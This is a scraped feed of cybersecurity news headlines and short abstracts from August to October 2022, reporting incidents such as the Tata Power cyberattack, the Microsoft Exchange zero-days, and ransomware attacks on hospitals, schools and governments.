Tata Power Company Limited, India's largest integrated power company, on Friday confirmed it was targeted by a cyberattack. The intrusion on IT infrastructure impacted "some of its IT systems," the company said in a filing with the National Stock Exchange (NSE) of India. It further said it has taken steps to retrieve and restore the affected machines, adding it put in place security guardrails for customer-facing portals to prevent unauthorized access. The Mumbai-based electric utility company, part of the Tata Group conglomerate, did not disclose any further details about the nature of the attack, or when it took place. That said, cybersecurity firm Recorded Future in April disclosed attacks mounted by China-linked adversaries targeting Indian power grid organizations. The network intrusions are said to have been aimed at "at least seven Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electThe Hacker News
October 15, 2022
Almost 900 servers hacked using Zimbra zero-day flaw Full Text
Abstract
Almost 900 servers have been hacked using a critical Zimbra Collaboration Suite (ZCS) vulnerability, which at the time was a zero-day without a patch for nearly 1.5 months.BleepingComputer
October 15, 2022
Indian power generation giant Tata Power hit by a cyber attack Full Text
Abstract
Tata Power Company Limited, India's largest power generation company, announced it was hit by a cyberattack. Tata Power on Friday announced that was hit by a cyber attack. Threat actors hit the Information Technology (IT) infrastructure of the company. The...Security Affairs
October 15, 2022
Tata Power, a top power producer in India, confirms cyberattack Full Text
Abstract
Tata Power, a leading power generation company in India, has confirmed it was hit by a cyberattack. In a brief statement, the Mumbai-based company said that the attack impacted some of its IT systems.Tech Crunch
October 13, 2022
Fast Company says Executive Board member info was not stolen in attack Full Text
Abstract
American business magazine Fast Company reached out to its Executive Board members this week to let them know their personal information was not stolen in a September 27 cyberattack that forced it to shut down its website.BleepingComputer
October 13, 2022
Mango Markets Loses Over $100 Million in Flash Loan Attack Full Text
Abstract
Mango Markets took to Twitter Tuesday evening to tell users that it was investigating an incident “where a hacker was able to drain funds from Mango via… price manipulation.”The Record
October 10, 2022
New Report Uncovers Emotet’s Delivery and Evasion Techniques Used in Recent Attacks Full Text
Abstract
Threat actors associated with the notorious Emotet malware are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection, according to new research from VMware. Emotet is the work of a threat actor tracked as Mummy Spider (aka TA542), emerging in June 2014 as a banking trojan before morphing into an all-purpose loader in 2016 that's capable of delivering second-stage payloads such as ransomware. While the botnet's infrastructure was taken down as part of a coordinated law enforcement operation in January 2021, Emotet bounced back in November 2021 through another malware known as TrickBot . Emotet's resurrection, orchestrated by the now-defunct Conti team, has since paved the way for Cobalt Strike infections and, more recently, ransomware attacks involving Quantum and BlackCat . "The ongoing adaptation of Emotet's execution chain is one reason the malware has been successful for so long," researchers from VMwaThe Hacker News
October 10, 2022
Australian Firm Costa Group Suffers Phishing Attack Full Text
Abstract
Australian fruit and vegetable supplier Costa Group says it was subjected to a malicious and sophisticated phishing attack in August that resulted in unauthorized access to its servers.Bank Info Security
October 10, 2022
Harvard Business Publishing licensee hit by ransomware Full Text
Abstract
Threat actors got to a database with over 152,000 customer records before its owner, the Turkish branch of Harvard Business Review, closed it. Crooks left a ransom note, threatening to leak the data and inform authorities of the EU’s General Data...Security Affairs
October 9, 2022
CommonSpirit hospital chains hit by ransomware, patients are facing problems Full Text
Abstract
CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that impacted its operations. Common Spirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe...Security Affairs
October 9, 2022
Lloyd’s of London investigates alleged cyber attack Full Text
Abstract
Lloyd's of London launched on Wednesday an investigating into a possible cyber attack after having detected unusual activity on its network. Lloyd's of London is investigating a cyberattack after detecting unusual network activity this week. In response...Security Affairs
October 8, 2022
State Bar of Georgia Notifies Members and Employees of Cybersecurity Incident Full Text
Abstract
The State Bar of Georgia announced that it experienced a cybersecurity incident that resulted in unauthorized access to its systems. After learning of the incident, the State Bar worked to restore its systems safely and resume normal operations.Dark Reading
October 7, 2022
Cyberattack Impacts City of Dunedin’s Email, Permit Payments, Utility Billing, and Inspection Scheduling Full Text
Abstract
Dunedin's water and wastewater facilities are secure, and city phones are working. However, city email, online payments for permits, inspection scheduling, utility billing, and Parks & Recreation programs, and Marina fees are all not working.USF
October 6, 2022
Lloyd’s of London investigates possible cyber attack Full Text
Abstract
"Lloyd’s has detected unusual activity on its network and we are investigating the issue," a Lloyd's spokesperson said by email, adding that the market was resetting the network.Reuters
October 5, 2022
New Zealand: Cyberattack on health provider Pinnacle potentially impacts thousands of patients’ data Full Text
Abstract
Health workers are scrambling to deal with a cyber attack that has compromised details kept by Waikato and Bay of Plenty health provider Pinnacle, which operates dozens of GP practices.Stuff NZ
October 03, 2022
Comm100 Chat Provider Hijacked to Spread Malware in Supply Chain Attack Full Text
Abstract
A threat actor likely with associations to China has been attributed to a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike said the attack made use of a signed Comm100 desktop agent app for Windows that was downloadable from the company's website. The scale of the attack is currently unknown, but the trojanized file is said to have been identified at organizations in the industrial, healthcare, technology, manufacturing, insurance, and telecom sectors in North America and Europe. Comm100 is a Canadian provider of live audio/video chat and customer engagement software for enterprises. It claims to have more than 15,000 customers across 51 countries. "The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate," the company noted , adding it remained available until September 29. EThe Hacker News
September 30, 2022
Update: Vice Society raises ransomware pressure on Los Angeles school district Full Text
Abstract
The threat, which was discovered and published on Twitter by Brett Callow from Emsisoft, effectively gives the Los Angeles school district less than four days to respond. Vice Society did not include any details about the data it plans to publish.Cybersecurity Dive
September 30, 2022
Cyber Attacks Against Middle East Governments Hide Malware in Windows logo Full Text
Abstract
An espionage-focused threat actor has been observed using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments. Broadcom's Symantec Threat Hunter Team attributed the updated tooling to a hacking group it tracks under the name Witchetty , which is also known as LookingFrog , a subgroup operating under the TA410 umbrella. Intrusions involving TA410 – which is believed to share connections with a Chinese threat group known as APT10 (aka Cicada, Stone Panda, or TA429) – primarily feature a modular implant called LookBack. Symantec's latest analysis of attacks between February and September 2022, during which the group targeted the governments of two Middle Eastern countries and the stock exchange of an African nation, highlights the use of a new backdoor called Stegmap. The new malware leverages steganography – a technique used to embed a message (in this case, malware) in a non-secret docThe Hacker News
September 30, 2022
New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons Full Text
Abstract
A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts. "The payload discovered is a leaked version of a Cobalt Strike beacon," Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday. "The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic." The malicious activity, discovered in August 2022, attempts to exploit the vulnerability CVE-2017-0199 , a remote code execution issue in Microsoft Office, that allows an attacker to take control of an affected system. The entry vector for the attack is a phishing email containing a Microsoft Word attachment that employs job-themed lures for roles in the U.S. government and PublThe Hacker News
September 30, 2022
Microsoft confirms new Exchange zero-days are used in attacks Full Text
Abstract
Microsoft has confirmed that two recently reported zero-day vulnerabilities in Microsoft Exchange Server 2013, 2016, and 2019 are being exploited in the wild.BleepingComputer
September 30, 2022
WARNING: New Unpatched Microsoft Exchange Zero-Day Under Active Exploitation Full Text
Abstract
Security researchers are warning of previously undisclosed flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems. That's according to Vietnamese cybersecurity company GTSC, which discovered the shortcomings as part of its security monitoring and incident response efforts in August 2022. The two vulnerabilities, which are formally yet to be assigned CVE identifiers, are being tracked by the Zero Day Initiative as ZDI-CAN-18333 (CVSS score: 8.8) and ZDI-CAN-18802 (CVSS score: 6.3). GTSC said that successful exploitation of the flaws could be abused to gain a foothold in the victim's systems, enabling adversaries to drop web shells and carry out lateral movements across the compromised network. "We detected web shells, mostly obfuscated, being dropped to Exchange servers," the company noted . "Using the user-agent, we detected that the attacker useThe Hacker News
September 29, 2022
New Microsoft Exchange zero-days actively exploited in attacks Full Text
Abstract
Threat actors are exploiting yet-to-be-disclosed Microsoft Exchange zero-day bugs allowing for remote code execution, according to claims made by security researchers at Vietnamese cybersecurity outfit GTSC, who first spotted and reported the attacks.BleepingComputer
September 29, 2022
Researchers Uncover Covert Attack Campaign Targeting Military Contractors Full Text
Abstract
A new covert attack campaign singled out multiple military and weapons contractor companies with spear-phishing emails to trigger a multi-stage infection process designed to deploy an unknown payload on compromised machines. The highly-targeted intrusions, dubbed STEEP#MAVERICK by Securonix, also targeted a strategic supplier to the F-35 Lightning II fighter aircraft. "The attack was carried out starting in late summer 2022 targeting at least two high-profile military contractor companies," Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in an analysis. Infection chains begin with a phishing mail with a ZIP archive attachment containing a shortcut file that claims to be a PDF document about "Company & Benefits," which is then used to retrieve a stager -- an initial binary that's used to download the desired malware -- from a remote server. This PowerShell stager sets the stage for a "robust chain of stagers" that progresses through seven mThe Hacker News
September 28, 2022
High-Profile Hacks Show Effectiveness of MFA Fatigue Attacks Full Text
Abstract
MFA provides an extra layer of security for user accounts. If a threat actor can obtain an account’s username and password through phishing or other methods, MFA should prevent them from accessing the account.Security Week
September 28, 2022
Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks Full Text
Abstract
The relatively new Bl00Dy Ransomware Gang has started to use a recently leaked LockBit ransomware builder in attacks against companies.BleepingComputer
September 27, 2022
Pass-the-Hash Attacks and How to Prevent them in Windows Domains Full Text
Abstract
Hackers often start out with nothing more than a low-level user account and then work to gain additional privileges that will allow them to take over the network. One of the methods that is commonly used to acquire these privileges is a pass-the-hash attack. Here are five steps to prevent a pass-the-hash attack in a Windows domain.BleepingComputer
September 25, 2022
OpIran: Anonymous declares war on Teheran amid Mahsa Amini’s death Full Text
Abstract
OpIran: Anonymous launched Operation Iran against Teheran due to the ongoing crackdown on dissent after Mahsa Amini’s death. Anonymous launched OpIran against Iran due to the ongoing crackdown on dissent after Mahsa Amini’s death. The protests...Security Affairs
September 24, 2022
Microsoft SQL servers hacked in TargetCompany ransomware attacks Full Text
Abstract
Security analysts at ASEC have discovered a new wave of attacks targeting vulnerable Microsoft SQL servers, involving the deployment of a ransomware strain named FARGO.BleepingComputer
September 23, 2022
UK Police arrests teen believed to be behind Uber, Rockstar hacks Full Text
Abstract
The City of London police announced on Twitter today the arrest of a British 17-year-old teen suspected of being involved in recent cyberattacks.BleepingComputer
September 23, 2022
Anonymous claims to have hacked the website of the Russian Ministry of Defense Full Text
Abstract
The popular collective Anonymous claims to have hacked the website of the Russian Ministry of Defense and leaked data of 305,925 people. The #OpRussia (#OpRussia) launched by Anonymous on Russia after the criminal invasion of Ukraine continues, the popular...Security Affairs
September 23, 2022
Sophos warns of new firewall RCE bug exploited in attacks Full Text
Abstract
Sophos warned today that a critical code injection security vulnerability in the company's Firewall product is being exploited in the wild.BleepingComputer
September 20, 2022
Uber believes that the LAPSUS$ gang is behind the recent attack Full Text
Abstract
Uber disclosed additional details about the security breach, the company blames a threat actor allegedly affiliated with the LAPSUS$ hacking group. Uber revealed additional details about the recent security breach, the company believes that the threat...Security Affairs
September 20, 2022
Bosnia and Herzegovina Investigating Alleged Ransomware Attack on Parliament Full Text
Abstract
While the prosecutor would not say what type of attack it is, sources confirmed to Nezavisne that it involved ransomware. The Sarajevo Times reported that the main server of parliament was shut off after the attack.The Record
September 19, 2022
New Gamaredon Campaign Targets Ukrainian entities with New Info-stealer Full Text
Abstract
A new cyberespionage campaign by Gamaredon is targeting employees from the Ukrainian government, law enforcement, and defense agencies, with custom-made malware. Researchers claim that its new infostealer is capable of stealing files from attached storage devices (local and remote).Cyware Alerts - Hacker News
September 15, 2022
Russian hackers use new info stealer malware against Ukrainian orgs Full Text
Abstract
Russian hackers have been targeting Ukrainian entities with previously unseen info-stealing malware during a new espionage campaign that is still active.BleepingComputer
September 15, 2022
Webworm hackers modify old malware in new attacks to evade attribution Full Text
Abstract
Chinese cyberespionage hackers of the 'Webworm' group are undergoing experimentation, using modified decade-old RATs (remote access trojans) in the wild.BleepingComputer
September 13, 2022
Asian Governments and Organizations Targeted in Latest Cyber Espionage Attacks Full Text
Abstract
Government and state-owned organizations in a number of Asian countries have been targeted by a distinct group of espionage hackers as part of an intelligence gathering mission that has been underway since early 2021. "A notable feature of these attacks is that the attackers leveraged a wide range of legitimate software packages in order to load their malware payloads using a technique known as DLL side-loading ," the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. The campaign is said to be exclusively geared towards government institutions related to finance, aerospace, and defense, as well as state-owned media, IT, and telecom firms. Dynamic-link library (DLL) side-loading is a popular cyberattack method that leverages how Microsoft Windows applications handle DLL files. In these intrusions, a spoofed malicious DLL is planted in the Windows Side-by-Side ( WinSxS ) directory so that the operating system loads itThe Hacker News
September 13, 2022
Iran-linked TA453 used new Multi-Persona Impersonation technique in recent attacks Full Text
Abstract
Iran-linked threat actors target individuals specializing in Middle Eastern affairs, nuclear security and genome research. In mid-2022, Proofpoint researchers uncovered a cyberespionage campaign conducted by Iran-linked TA453 threat actors. The...Security Affairs
September 13, 2022
Montenegro and its allies are working to recover from the massive cyber attack Full Text
Abstract
A massive cyberattack hit Montenegro, officials believe that it was launched by pro-Russian hackers and the security services of Moscow. A massive cyberattack hit Montenegro, the offensive forced government headquarters to disconnect the systems from...Security Affairs
September 13, 2022
Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel Full Text
Abstract
The hacktivist collective GhostSec claimed to have compromised 55 Berghof PLCs used by Israeli organizations. Pro-Palestinian Hacking Group GhostSec claimed to have compromised 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations...Security Affairs
September 12, 2022
Hackers steal Steam accounts in new Browser-in-the-Browser attacks Full Text
Abstract
Hackers are launching new attacks to steal Steam credentials using a Browser-in-the-Browser phishing technique that is rising in popularity among threat actors.BleepingComputer
September 12, 2022
China Accuses NSA’s TAO Unit of Hacking its Military Research University Full Text
Abstract
China has accused the U.S. National Security Agency (NSA) of conducting a string of cyberattacks aimed at aeronautical and military research-oriented Northwestern Polytechnical University in the city of Xi'an in June 2022. The National Computer Virus Emergency Response Centre (NCVERC) disclosed its findings last week, and accused the Office of Tailored Access Operations ( TAO ) at the USA's National Security Agency (NSA) of orchestrating thousands of attacks against the entities located within the country. "The U.S. NSA's TAO has carried out tens of thousands of malicious cyber attacks on China's domestic network targets, controlled tens of thousands of network devices (network servers, Internet terminals, network switches, telephone exchanges, routers, firewalls, etc.), and stole more than 140GB of high-value data," the NCVERC said . The agency further said that the attack on the Northwestern Polytechnical University employed no fewer than 40 differentThe Hacker News
September 11, 2022
Albania was hit by a new cyberattack and blames Iran Full Text
Abstract
Albania blamed Iran for a new cyberattack that hit computer systems used by the state police on Friday. Albania blamed the government of Teheran for a new cyberattack that hit computer systems used by the state police on Saturday. "The national...Security Affairs
September 10, 2022
IHG suffered a cyberattack that severely impacted its booking process Full Text
Abstract
InterContinental Hotels Group PLC (IHG) discloses a security breach, parts of its IT infrastructure has been subject to unauthorised activity The hospitality conglomerate, InterContinental Hotel Group (IHG) manages 17 hotel chains, including the Regent,...Security Affairs
September 09, 2022
Vice Society claims LAUSD ransomware attack, theft of 500GB of data Full Text
Abstract
The Vice Society gang has claimed the ransomware attack that hit Los Angeles Unified (LAUSD), the second largest school district in the United States, over the weekend.BleepingComputer
September 9, 2022
Update: Vice Society ransomware claims credit for Los Angeles school attack Full Text
Abstract
The ransomware outfit known as Vice Society has claimed credit for an attack earlier this week that disabled several IT systems at the Los Angeles Unified School District, according to a report.State Scoop
September 08, 2022
GIFShell attack creates reverse shell using Microsoft Teams GIFs Full Text
Abstract
A new attack technique called 'GIFShell' allows threat actors to abuse Microsoft Teams for novel phishing attacks and covertly executing commands to steal data using ... GIFs.BleepingComputer
September 08, 2022
Hackers Repeatedly Targeting Financial Services in French-Speaking African Countries Full Text
Abstract
Major financial and insurance companies located in French-speaking nations in Africa have been targeted over the past two years as part of a persistent malicious campaign codenamed DangerousSavanna . Countries targeted include Ivory Coast, Morocco, Cameroon, Senegal, and Togo, with the spear-phishing attacks heavily focusing on Ivory Coast in recent months, Israeli cybersecurity firm Check Point said in a Tuesday report. Infection chains entail targeting employees of financial institutions with social engineering messages containing malicious attachments as a means of initial access, ultimately leading to the deployment of off-the-shelf malware such as Metasploit , PoshC2 , DWservice , and AsyncRAT . "The threat actors' creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaderThe Hacker News
September 7, 2022
Nearly 5 Million Attacks Blocked Targeting 0-Day in BackupBuddy Plugin Full Text
Abstract
Late evening, on September 6, 2022, the Wordfence Threat Intelligence team was alerted to the presence of a vulnerability being actively exploited in BackupBuddy, a WordPress plugin we estimate has around 140,000 active installations.Wordfence
September 07, 2022
200,000 North Face accounts hacked in credential stuffing attack Full Text
Abstract
Outdoor apparel brand 'The North Face' was targeted in a large-scale credential stuffing attack that has resulted in the hacking of 194,905 accounts on the thenorthface.com website.BleepingComputer
September 07, 2022
Albania blames Iran for July cyberattack, severs diplomatic ties Full Text
Abstract
Albanian Prime Minister Edi Rama announced on Wednesday that the entire staff of the Embassy of the Islamic Republic of Iran was asked to leave within 24 hours.BleepingComputer
September 07, 2022
Google says former Conti ransomware members now attack Ukraine Full Text
Abstract
Google says some former Conti cybercrime gang members, now part of a threat group tracked as UAC-0098, are targeting Ukrainian organizations and European non-governmental organizations (NGOs).BleepingComputer
September 6, 2022
The Los Angeles Unified School District hit by a ransomware attack Full Text
Abstract
One of the US largest School districts, the Los Angeles Unified School District, suffered a ransomware attack during the weekend. The Los Angeles Unified School District is one of the largest school distinct in the US, it was hit by a ransomware attack...Security Affairs
September 05, 2022
TikTok denies security breach after hackers leak user data, source code Full Text
Abstract
TikTok denies recent claims it was breached, and source code and user data were stolen, telling BleepingComputer that data posted to a hacking forum is "completely unrelated" to the company.BleepingComputer
September 4, 2022
Anonymous hacked Yandex taxi causing a massive traffic jam in Moscow Full Text
Abstract
The popular collective Anonymous and the IT Army of Ukraine hacked the Yandex Taxi app causing a massive traffic jam in Moscow. This week Anonymous announced to have hacked the Yandex Taxi app, the largest taxi service in Russia, and used it to cause...Security Affairs
September 02, 2022
Damart clothing store hit by Hive ransomware, $2 million demanded Full Text
Abstract
Damart, a French clothing company with over 130 stores across the world, is being extorted for $2 million after a cyberattack from the Hive ransomware gang.BleepingComputer
September 2, 2022
Attack infrastructure used in Cisco hack linked to Evil Corp affiliate Full Text
Abstract
Researchers discovered that the infrastructure used in Cisco hack was the same used to target a Workforce Management Solution firm. Researchers from cybersecurity firm eSentire discovered that the attack infrastructure used in recent Cisco hack was also...Security Affairs
September 01, 2022
New ransomware hits Windows, Linux servers of Chile govt agency Full Text
Abstract
Chile's national computer security and incident response team (CSIRT) has announced that a ransomware attack has impacted operations and online services of a government agency in the country.BleepingComputer
September 01, 2022
Montenegro hit by ransomware attack, hackers demand $10 million Full Text
Abstract
The government of Montenegro has admitted that its previous allegations about Russian threat actors attacking critical infrastructure in the country were false and now blames ransomware for the damage to its IT infrastructure that has caused extensive service disruptions.BleepingComputer
September 1, 2022
Migration Policy Organization Confirms Cyberattack After Extortion Group Touts Data Theft Full Text
Abstract
The organization is in the process of investigating what information was compromised, according to Bernhard Schragl, communication coordinator for ICMPD, who added that they have reported the incident to law enforcement agencies.The Record
September 01, 2022
Infra Used in Cisco Hack Also Targeted Workforce Management Solution Full Text
Abstract
The attack infrastructure used to target Cisco in the May 2022 incident was also employed against an attempted compromise of an unnamed workforce management solutions holding company a month earlier in April 2022. Cybersecurity firm Sentire, which disclosed the findings, raised the possibility that the intrusions could be the work of a criminal actor known as mx1r, who is said to be a member of the Evil Corp affiliate cluster dubbed UNC2165 . Evil Corp, the progenitors of the infamous Dridex banking trojan, have, over the years, refined their modus operandi to run a series of ransomware operations to sidestep sanctions imposed by the U.S. Treasury in December 2019. Initial access to the company's IT network was made possible by using stolen Virtual Private Network (VPN) credentials, followed by leveraging off-the-shelf tools for lateral movement and gaining deeper access into the victim's environment. "Using Cobalt Strike, the attackers were able to gain an initThe Hacker News
September 1, 2022
Ransomware Attacks Target Chilean Government Agencies Through Windows and VMware ESXi Servers Full Text
Abstract
Chile’s Ministry of Interior reported last week that a government agency had its systems and online services disrupted by a piece of ransomware that targeted Windows and VMware ESXi servers.Security Week
August 31, 2022
Ragnar Locker ransomware claims attack on Portugal’s flag airline Full Text
Abstract
The Ragnar Locker ransomware gang has claimed an attack on the flag carrier of Portugal, TAP Air Portugal, disclosed by the airline last Friday.BleepingComputer
August 31, 2022
Update: Cuba Ransomware Apparently Involved in Russia-Linked Attack on Montenegro Government Full Text
Abstract
The Cuba ransomware gang claimed to have stolen files on August 19, including financial documents and source code. They allegedly obtained correspondence with bank employees, balance sheets, account activity, compensation data, and tax documents.Security Week
August 31, 2022
Chinese Hackers Used ScanBox Framework in Recent Cyber Espionage Attacks Full Text
Abstract
A months-long cyber espionage campaign undertaken by a Chinese nation-state group targeted several entities with reconnaissance malware so as to glean information about its victims and meet its strategic goals. "The targets of this recent campaign spanned Australia, Malaysia, and Europe, as well as entities that operate in the South China Sea," enterprise security firm Proofpoint said in a published in partnership with PwC. Targets encompass local and federal Australian Governmental agencies, Australian news media companies, and global heavy industry manufacturers which conduct maintenance of fleets of wind turbines in the South China Sea. Proofpoint and PwC attributed the intrusions with moderate confidence to a threat actor tracked by the two companies under the names TA423 and Red Ladon respectively, which is also known as APT40 and Leviathan. APT40 is the name designated to a China-based, espionage-motivated threat actor that's known to be active since 2013 andThe Hacker News
August 30, 2022
Three campaigns delivering multiple malware, including ModernLoader and XMRig miner Full Text
Abstract
Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering...Security Affairs
August 30, 2022
World’s largest distributors of books Baker & Taylor hit by ransomware Full Text
Abstract
Baker & Taylor, one of the world's largest distributors of books, revealed that it was hit by a ransomware attack. Baker & Taylor, one of the world's largest distributors of books worldwide, suffered a ransomware attack on August 23. The incident...Security Affairs
August 29, 2022
Leading library services firm Baker & Taylor hit by ransomware Full Text
Abstract
Baker & Taylor, which describes itself as the world's largest distributor of books to libraries worldwide, today confirmed it's still working on restoring systems after being hit by ransomware more than a week ago.BleepingComputer
August 29, 2022
Update: U.K. NHS cyberattack causing ‘total chaos’ in hospitals could take a year to recover Full Text
Abstract
It has been 22 days since the outage and Carenotes is yet to be restored. Staff at a Birmingham hospital were told on 17 August that restoration could take a further five weeks.Independent
August 27, 2022
Unprecedented cyber attack hit State Infrastructure of Montenegro Full Text
Abstract
The state Infrastructure of Montenegro was hit by a massive and "unprecedented" cyber attack, authorities announced. An unprecedented cyber attack hit the Government digital infrastructure in Montenegro, the government has timely adopted measures...Security Affairs
August 25, 2022
Update: Twilio, Cloudflare Attacked in Campaign That Hit Over 130 Organizations Full Text
Abstract
The attacks disclosed recently by Twilio and Cloudflare were part of a massive phishing campaign that targeted at least 130 other organizations, according to cybersecurity company Group-IB.Security Week
August 25, 2022
LastPass developer systems hacked to steal source code Full Text
Abstract
Password management firm LastPass was hacked two weeks ago, enabling threat actors to steal the company's source code and proprietary technical information.BleepingComputer
August 25, 2022
GAIROSCOPE attack allows to exfiltrate data from Air-Gapped systems via ultrasonic tones Full Text
Abstract
GAIROSCOPE: An Israeli researcher demonstrated how to exfiltrate data from air-gapped systems using ultrasonic tones and smartphone gyroscopes. The popular researcher Mordechai Guri from the Ben-Gurion University of the Negev in Israel devise an attack...Security Affairs
August 25, 2022
Researchers Uncover Kimusky Infra Targeting South Korean Politicians and Diplomats Full Text
Abstract
The North Korean nation-state group Kimusky has been linked to a new set of malicious activities directed against political and diplomatic entities located in its southern counterpart in early 2022. Russian cybersecurity firm Kaspersky codenamed the cluster GoldDragon , with the infection chains leading to the deployment of Windows malware designed to file lists, user keystrokes, and stored web browser login credentials. Included among the potential victims are South Korean university professors, think tank researchers, and government officials. Kimsuky , also known as Black Banshee, Thallium, and Velvet Chollima, is the name given to a prolific North Korean advanced persistent threat (APT) group that targets entities globally, but with a primary focus on South Korea, to gain intelligence on various topics of interest to the regime. Known to be operating since 2012, the group has a history of employing social engineering tactics, spear-phishing, and watering hole attacks to exfThe Hacker News
August 24, 2022
RansomEXX claims ransomware attack on Sea-Doo, Ski-Doo maker Full Text
Abstract
The RansomEXX ransomware gang is claiming responsibility for the cyberattack against Bombardier Recreational Products (BRP), disclosed by the company on August 8, 2022.BleepingComputer
August 24, 2022
France hospital Center Hospitalier Sud Francilien suffered ransomware attack Full Text
Abstract
A French hospital, the Center Hospitalier Sud Francilien (CHSF), suffered a cyberattack on Sunday and was forced to refer patients to other structures. The Center Hospitalier Sud Francilien (CHSF), a hospital southeast of Paris, has suffered...Security Affairs
August 24, 2022
Researchers Warn of AiTM Attack Targeting Google G-Suite Enterprise Users Full Text
Abstract
The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services have also set their sights on Google Workspace users. "This campaign specifically targeted chief executives and other senior members of various organizations which use [Google Workspace]," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu detailed in a report published this month. The AiTM phishing attacks are said to have commenced in mid-July 2022, following a similar modus operandi as that of a social engineering campaign designed to siphon users' Microsoft credentials and even bypass multi-factor authentication. The low-volume Gmail AiTM phishing campaign also entails using the compromised emails of chief executives to conduct further social engineering, with the attacks also utilizing several compromised domains as an intermediate URL redirector to take the victims to the final landing page. Attack chaThe Hacker News
August 23, 2022
French hospital hit by $10M ransomware attack, sends patients elsewhere Full Text
Abstract
The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the center of Paris, suffered a cyberattack on Sunday, which has resulted in the medical center referring patients to other establishments and postponing appointments for surgeries.BleepingComputer
August 20, 2022
New Grandoreiro Banking Malware Campaign Targeting Spanish Manufacturers Full Text
Abstract
Organizations in the Spanish-speaking nations of Mexico and Spain are in the crosshairs of a new campaign designed to deliver the Grandoreiro banking trojan. "In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute 'Grandoreiro,' a prolific banking trojan that has been active since at least 2016, and that specifically targets users in Latin America," Zscaler said in a report. The ongoing attacks, which commenced in June 2022, have been observed to target automotive, civil and industrial construction, logistics, and machinery sectors via multiple infection chains in Mexico and chemicals manufacturing industries in Spain. Attack chains entail leveraging spear-phishing emails written in Spanish to trick potential victims into clicking on an embedded link that retrieves a ZIP archiveThe Hacker News
August 20, 2022
Whitworth University Still Recovering from Ransomware Attack Full Text
Abstract
Whitworth University is taking steps to shore up its cyber defenses following a reported ransomware attack that has left the university's network crippled since late last month.Government Technology
August 19, 2022
Bumblebee attacks, from initial access to the compromise of Active Directory Services Full Text
Abstract
Threat actors are using the Bumblebee loader to compromise Active Directory services as part of post-exploitation activities. The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee...Security Affairs
August 19, 2022
SAP Vulnerability Exploited in Attacks After Details Disclosed at Hacker Conferences Full Text
Abstract
The SAP vulnerability added to CISA’s list, tracked as CVE-2022-22536, was patched by the vendor in February in NetWeaver Application Server ABAP, NetWeaver Application Server Java, ABAP Platform, Content Server 7.53 and Web Dispatcher.Security Week
August 19, 2022
Estonia blocked cyberattacks claimed by Pro-Russia Killnet group Full Text
Abstract
Estonia announced to have blocked a wave of cyber attacks conducted by Russian hackers against local institutions. Undersecretary for Digital Transformation Luukas Ilves announced that Estonia was hit by the most extensive wave of DDoS attacks it has faced...Security Affairs
August 18, 2022
LockBit claims ransomware attack on security giant Entrust Full Text
Abstract
The LockBit ransomware gang has claimed responsibility for the June cyberattack on digital security giant Entrust.BleepingComputer
August 18, 2022
Russian Cyber Attacks on Ukraine driven by Government Groups Full Text
Abstract
Russia's nation-state crews have been breaking into Ukrainian networks and attempting to disrupt or even destroy vulnerable systems. A bevy of attacks and malware samples can all be tied back to Kremlin-backed hacking groups.Tech Target
August 17, 2022
RedAlpha Conducts Multi-Year Credential Theft Campaign Targeting Critical Entities Globally Full Text
Abstract
Chinese state-sponsored threat activity group RedAlpha has been registering and weaponizing hundreds of domains spoofing global organizations to target government organizations and think tanks globally.Recorded Future
August 17, 2022
North Korean hackers use signed macOS malware to target IT job seekers Full Text
Abstract
North Korean hackers from the Lazarus group have been using a signed malicious executable for macOS to impersonate Coinbase and lure in employees in the financial technology sector.BleepingComputer
August 16, 2022
New Evil PLC Attack Weaponizes PLCs to Breach OT and Enterprise Networks Full Text
Abstract
Cybersecurity researchers have elaborated a novel attack technique that weaponizes programmable logic controllers ( PLCs ) to gain an initial foothold in engineering workstations and subsequently invade the operational technology (OT) networks. Dubbed " Evil PLC " attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider Electric, GE, B&R, Xinje, OVARRO, and Emerson. Programmable logic controllers are a crucial component of industrial devices that control manufacturing processes in critical infrastructure sectors. PLCs, besides orchestrating the automation tasks, are also configured to start and stop processes and generate alarms. It's hence not surprising that the entrenched access provided by PLCs have made the machines a focus of sophisticated attacks for more than a decade, starting from Stuxnet to PIPEDREAM (aka INCONTROLLER), with the goal of causing physical disruptions. "TheThe Hacker News
August 16, 2022
Hackers attack UK water supplier but extort wrong company Full Text
Abstract
South Staffordshire Water, a company supplying 330 million liters of drinking water to 1.6 consumers daily, has issued a statement confirming IT disruption from a cyberattack.BleepingComputer
August 16, 2022
Hackers attack UK water supplier with 1.6 million customers Full Text
Abstract
